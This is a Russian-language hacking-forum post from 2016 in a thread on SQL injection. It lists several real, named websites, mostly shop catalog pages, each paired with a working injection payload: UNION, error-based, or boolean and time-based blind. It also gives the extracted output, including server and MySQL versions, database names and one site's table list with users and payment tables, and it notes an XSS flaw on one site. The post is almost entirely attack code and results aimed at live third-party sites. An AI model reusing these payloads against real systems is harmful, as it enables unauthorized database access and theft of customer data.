Тема: SQL Инъекции
Показать сообщение отдельно

  #94  
Старый 24.04.2016, 14:10
danil7493
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами: 7791446

Репутация: 10
По умолчанию
Код:
http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
5.5.34-32.0-log

=================================================================================================================
https://www.fairradio.com/catalog.php?mode=view&categoryid=214
---
Parameter: categoryid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [2]:[*] fairrad_radio[*] information_schema

=================================================================================================================
http://www.dataapex.com/catalog.php?catCategory=1
---
Parameter: catCategory (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL 5.0.12

=================================================================================================================
http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
5.5.41-0+wheezy1
+ XSS

=================================================================================================================
http://jewelfox.ru/catalog.php?catId=ard
---
Parameter: catId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
Database: jewelfo9_db73544m
[32 tables]
+-------------------+
| arrival_list      |
| arrival_list_lot  |
| basket            |
| box               |
| business          |
| category          |
| defect            |
| delivery          |
| favorites         |
| logistics         |
| lots              |
| motion            |
| motion_logistics  |
| motion_lot        |
| order_tao         |
| order_tao_comment |
| order_tao_lots    |
| orders            |
| partCategory      |
| payment           |
| privilege         |
| purchase          |
| recovery          |
| requirement       |
| role              |
| role_privilege    |
| store             |
| store_location    |
| topMenu           |
| user_location     |
| user_role         |
| users             |
+-------------------+
=================================================================================================================
http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
=================================================================================================================
http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
4.0.24_Debian-10sarge3-log
 
Ответить с цитированием